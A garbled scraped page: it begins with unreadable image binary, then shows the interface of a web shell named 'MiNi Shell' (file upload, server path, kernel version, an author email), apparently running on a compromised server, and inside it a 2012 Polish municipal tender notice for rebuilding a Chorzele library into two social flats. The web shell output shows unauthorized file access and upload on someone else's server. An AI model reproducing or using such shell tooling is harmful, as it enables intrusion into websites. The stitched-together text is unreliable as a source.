JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/243972-N-2012.html

<p class="kh_header"><b>Chorzele: Przebudowa budynku przy ul. Zduńskiej 35 w Chorzelach ze zmianą sposobu użytkowania na mieszkania socjalne</b><br>
<b>Numer ogłoszenia: 243972 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chorzele , ul. Stanisława Komosińskiego 1, 06-330 Chorzele, woj. mazowieckie, tel. 29 7515161, faks 29 7515686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminachorzele.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku przy ul. Zduńskiej 35 w Chorzelach ze zmianą sposobu użytkowania na mieszkania socjalne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem inwestycji jest przebudowa budynku przy ul. Zduńskiej 35 w Chorzelach ze zmianą sposobu użytkowania na mieszkania socjalne.
2) Istniejący budynek pełniący dotychczas funkcję biblioteki ulegnie remontowi i przebudowie istniejących pomieszczeń, budynek po wykonaniu prac będzie pełnił funkcje mieszkalne. Podstawowym zadaniem, jakie ma spełniać przedmiotowy remont jest stworzenie dwóch niezależnych mieszkań z oddzielnymi wejściami do budynku jednorodzinnego dwuizbowego, które mogą pełnić funkcję mieszkań socjalnych. Remont i przebudowa w całości będzie wykonany w technologii tradycyjnej, z zastosowaniem atestowanych materiałów dostępnych na rynku, posiadających wszelkie aprobaty i certyfikaty.
3) Infrastruktura techniczna terenu objętego budową:
3.1 zaopatrzenie w energię elektryczną z istniejącego przyłącza energetycznego, 
3.2 zaopatrzenie w wodę z istniejącego przyłącza sieci wodociągowej,
3.3 zaopatrzenie w energie cieplną z projektowanej kotłowni na paliwo stałe (ekogroszek),
3.4 odprowadzenie wód opadowych z dachu na teren,
3.5 gospodarowanie odpadami - w pojemnikach do czasowego gromadzenia odpadów stałych (znajdujących się na terenie posesji) systematycznie opróżnianych na bazie podpisanej umowy ze specjalistyczną firmą utylizacyjną,
3.6 określenie dostępu do drogi publicznej na posesje -  istniejący zjazd na drogę główną.
4) Powierzchnia.
- powierzchnia zabudowy budynku: 76,68m2
- Kubatura budynku:   386m3                                                                                                    
- Powierzchnia użytkowa:                   99,8m2                                                                        
5) Zestawienie pomieszczeń, projektowana posadzka.
5.1. Pomieszczenia techniczne:
- Kotłownia, pow. 10,82 m2 - płytki gresowe
Razem pomieszczenia techniczne - pow. 10,82m2.
5.2. Mieszkanie 1.
- Łazienka, pow. 4,81 - płytki gresowe;
- Przedsionek, pow. 2,98 - płytki gresowe;
- Hall, pow. 5,79 - Wykładzina PCV;
- Kuchnia , pokój dzienny, pow. 29,01 - wykładzina PCV;
Razem mieszkanie 1- pow. 42,59m2.
5.3. Mieszkanie 2.
- Przedsionek, pow. 5,25 - płytki gresowe;
- Pokój, pow. 14,92m2 - wykładzina PCV;
- Korytarz, pow. 5,02m2 - wykładzina PCV;
- Łazienka, pow. 4,09m2 - płytki gresowe;
- Kuchnia , pokój dzienny, pow. 17,11m2 - wykładzina PCV 
Razem mieszkanie 2 - pow. 46,39m2.
Razem parter: 58,66 m2,
Razem poddasze: 41,14 m2,
Powierzchnia użytkowa: łącznie: 99,8 m2.
6) Rozwiązania  architektoniczno-budowlane  oraz dane konstrukcyjno-materiałowe.
Remont i przebudowa w całości będzie wykonywany w technologii tradycyjnej, z zastosowaniem atestowanych materiałów dostępnych na rynku, posiadających wszelkie aprobaty i certyfikaty. Projektowane nowe ściany wewnętrzne systemowe z płyt karto-gipsowych grubości 12cm z wypełnieniem z wełny mineralnej. W pomieszczeniach mokrych podwójne płyty wodoodporne. Rozbierana jest tylko jedna ścianka pomiędzy pomieszczeniami łazienki w ganku oraz wykuwany otwór drzwiowy do kotłowni. Przy nowym wejściu do kotłowni projektowane schody z kostek betonowych. 
Projektowana wentylacja pomieszczeń w postaci rur Spiro o160 wyprowadzonych ponad dach zakończone kominkiem wentylacyjnym systemowym, wykonać nowe obróbki blacharskie wokół kominków oraz odpowiednio je uszczelnić.
Wymiana  istniejącej zniszczonej stolarki drzwiowej na stolarkę drzwiową drewnianą w kolorze białym. Drzwi wewnętrzne, zwykłe, drewniane pełne , skrzydła drzwiowe na 3 zawiasach. Kolor drzwi biały. Do sanitariatów  drzwi PCV. Skrzydła powinny być wyposażone w otwory wentylacyjne. Ościeżnice drzwiowe w pomieszczeniach mokrych stalowe, skrzydła drzwiowe na 3 zawiasach, należy wyposażyć w samozamykacze zawiasowe. Kolor drzwi biały.
Projektowane wejście do kotłowni wykonać należy jako schody wyprofilowane kostek betonowych grubości 6cm z wykończeniem powierzchniowym antypoślizgowym.
Uszkodzone tynki ze ścian i sufitów skuć w 20%. Wykonać należy nowe elementy wykończeniowe wg dokumentacji rysunkowej. Uszkodzenia ścian naprawić wg przyjętej technologii naprawy elementów i konstrukcji murowych i żelbetowych. Szacuję się że do naprawy będzie około 20% powierzchni tynków wewnętrznych i 100% malowania powierzchni ścian sufitów , kominów i elementów wewnętrznych dachu. 
7) Podłogi i posadzki. 
Wszystkie istniejące warstwy posadzki  starych parkietów ,wykładzin itd. usunąć. Po do-kładnym usunięciu starych warstw posadzki należy usunąć wszystkie nierówności, a ewentualne ubytki wyrównać . 
Pomieszczenia mieszkalne.
- podłoga - wykładzina PCV,
- ściany - tynki cementowo-wapienne z gładzią malowane farbą lateksową o satynowym stopniu połysku,
- sufit - tynki cementowo-wapienne z gładzią malowane farbą emulsyjną,
- przed malowaniem ścian wymagane jest wykonanie naprawy tynków oraz gładzi,
Pomieszczenia mokre.
- podłoga - płytki gresowe,
- ściany - płytki ceramiczne ścienne do wys. 2 m, powyżej tynki cementowo-wapienne z gładzią malowane farbą lateksową o satynowym stopniu połysku,
- sufit - tynki cementowo-wapienne z gładzią malowane farbą emulsyjną,
- płytki ceramiczne ścienne ( gat.I) do górnej wysokości drzwi (h= 200 ),
- płytki ceramiczne, na ścianach - mocowane na kleju wodoodpornym , elastycznym,
8) Instalacja elektryczna.
Zakres prac obejmuje projekt  budowlany przebudowy instalacji elektrycznych w budynku przy ul. Zduńskiej 35 w Chorzelach w celu dostosowania do nowej funkcji 2 mieszkań socjalnych. W wyniku przebudowy powstaną 2 mieszkania, które zasilane będą z istniejącego na tej samej działce budynku sąsiedniego, posiadającego licznik do rozliczeń z dostawcą energii elektrycznej.
W projekcie uwzględniono następujące instalacje:
- montaż zabezpieczenia na tablicy zasilającej,
- wykonanie wlz od budynku z tablicą zasilającą,
- montaż tablic TE1 i TE2,
- oświetlenia i gniazd wtykowych,
- połączeń wyrównawczych, 
9) Instalacje sanitarne.
9.1. Instalacja wodna.
W budynku projektuje się instalację wody  zimnej, ciepłej i cyrkulacji dla potrzeb sanitarno - higienicznych . Źródłem wody zimnej pozostaje istniejący wodociąg, źródłem wody ciepłej jest projektowany podgrzewacz CWU zasilany z projektowanego kotła. Projektowaną instalację CWU należy włączyć do podgrzewacza CWU w kotłowni. Do najdalej oddalonych punktów poboru wody na piętrze doprowadzono cyrkulację ciepłej wody, w celu utrzymania stałej temperatury wody. Instalację wyregulować należy wielofunkcyjnymi zaworami termostatycznymi typu MTCV wersja A-Basic lub innymi o nie gorszych parametrach.
9.2. Instalacja kanalizacji sanitarnej.
Nowo projektowaną instalację kanalizacji należy wpiąć do istniejącego przyłącza kanalizacji oraz rozprowadzić przewody jak na rzucie i rozwinięciu instalacji       wod-kan. Instalację kanalizacyjną sanitarną wewnętrzną pod posadzką wykonać z rur kanalizacyjnych kielichowych PVC. Instalację powyżej posadzki wykonać z rur kanalizacyjnych kielichowych z PP.
Poziome przewody kanalizacyjne pod posadzką projektuje się z rur kanalizacyjnych PVC O160 i O110 np. prod. Wavin uszczelnionych na pierścienie gumowe. Podejścia odpływowe należy wykonać z rur kanalizacyjnych PVC lub PP O50, O75 i O110 np. prod. Wavin uszczelnionych na pierścień gumowy. 
Piony kanalizacyjne zakończyć wywiewkami wyprowadzonymi ponad dach na wysokość min. 50 cm. Na pionach przed przejściem w przewody odpływowe należy umieścić rewizje. W obudowie pionów należy pozostawić dostęp do rewizji.
10) Instalacja centralnego ogrzewania (CO).
Instalacja CO w systemie rozdzielaczowym, dwururowym, pompowym, zasilaną z kotłowni.
10.1. Kotłownia.
Źródłem instalacji CO, będzie kocioł na paliwo stałe Ekogroszek zlokalizowany w budynku w pomieszczeniu kotłowni. Pomieszczenie powinno spełniać wymagania dla pomieszczeń dla kotłów o mocy nominalnej mniejszej niż 25kW. 
Inne roboty wynikające z projektu, przedmiaru i technologii robót.
Dokładny opis przedmiotu zamówienia zawarty jest w przedmiarach robót, szczegółowych specyfikacjach technicznych wykonania i odbioru robót, projektach budowlanych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.45.30.00-7, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.
Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 4 000,00 zł, (słownie: cztery tysiące złotych).
2. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) W pieniądzu, przelewem na rachunek bankowy: 
Bank Spółdzielczy w Chorzelach Nr 31 8913 0005 0000 1472 2000 0030 z        adnotacją -wadium - Przebudowa budynku przy ul. Zduńskiej 35 w Chorzelach ze zmianą sposobu użytkowania na mieszkania socjalne. 
2) W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) W gwarancjach bankowych, 
4) W gwarancjach ubezpieczeniowych,
5) W poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zmianami),
6) Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w        oryginale i musi obejmować cały okres związania ofertą.
7) Wadium musi być wniesione przed upływem wyznaczonego terminu składania ofert tj. do dnia 25.07.2012r. do godz. 12.00.
8) Sposób przekazania: 
Oryginał dokumentu potwierdzającego wniesienie wadium w formach innych niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Chorzelach, pok. Nr 2, ul. Stanisława Komosińskiego 1, 06-330 Chorzele, kopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty.
Jeżeli wadium wniesiono w pieniądzu, Wykonawca powinien załączyć do oferty    dowód wniesienia wadium na konto Zamawiającego.
9) Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
10) Dokumenty dotyczące wniesienia wadium w formach innych niż w pieniądzu należy złożyć w formie oryginału.
11) W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
12) W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum) wymagane wadium wnosi konsorcjum lub jeden z jego członków.
W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta będzie podlegać odrzuceniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Wymagane są uprawnienia budowlane do kierowania robotami budowlanymi w stosownej specjalności,  zgodnie z  przepisami ustawy Prawo budowlane - dla osoby pełniącej funkcję kierownika robót. Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia  posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Wymagane jest wykonanie w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia min. 1 roboty budowlanej związanej z budową, przebudową lub remontem budynku mieszkalnego lub budynku użyteczności publicznej w okresie ostatnich pięciu lat przed upływem terminu składania ofert (od 25.07.2007r. do 25.07.2012r.),  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości każdej z nich, nie mniejszej niż 150 000,00 złotych brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Wymagane jest posiadanie narzędzi i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Wymagane jest dysponowanie osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych.  Warunek zostanie spełniony, jeżeli Wykonawca załączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności i przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż 150 000,00 złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia następujących zmian w umowie: 
1. zmiana terminu zakończenia zadania, zmiana zakresu rzeczowego lub technologii robót - w przypadku udzielenia w trakcie realizacji umowy zamówień dodatkowych, związanych z realizacją zamówienia podstawowego,
2. zmiana terminu realizacji przedmiotu umowy w przypadku niemożności wykonania robót budowlanych z przyczyn niezależnych od Wykonawcy lub Zamawiającego. Termin zakończenia umowy może zostać zmieniony przez strony z uwzględnieniem czasu trwania przyczyny,
3. zmiana terminu w przypadku wystąpienia warunków pogodowych uniemożliwiających realizację robót,
4. zmiana personelu nadzorującego roboty. 
Korekty terminów zostaną przedłożone każdorazowo Zamawiającemu w terminie siedmiu dni kalendarzowych po powzięciu wiadomości o konieczności wprowadzenia zmian w umowie w formie aneksu do umowy. Minimalny termin przesunięcia terminu zakończenia będzie równy okresowi przerwy postoju.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminachorzele.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, p. Karol Sznytka, tel. (29) 7516552, fax. (29) 7515686, od poniedziałku do piątku w godz. 8.30 - 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 12:00, miejsce: Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, 06-330 Chorzele (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com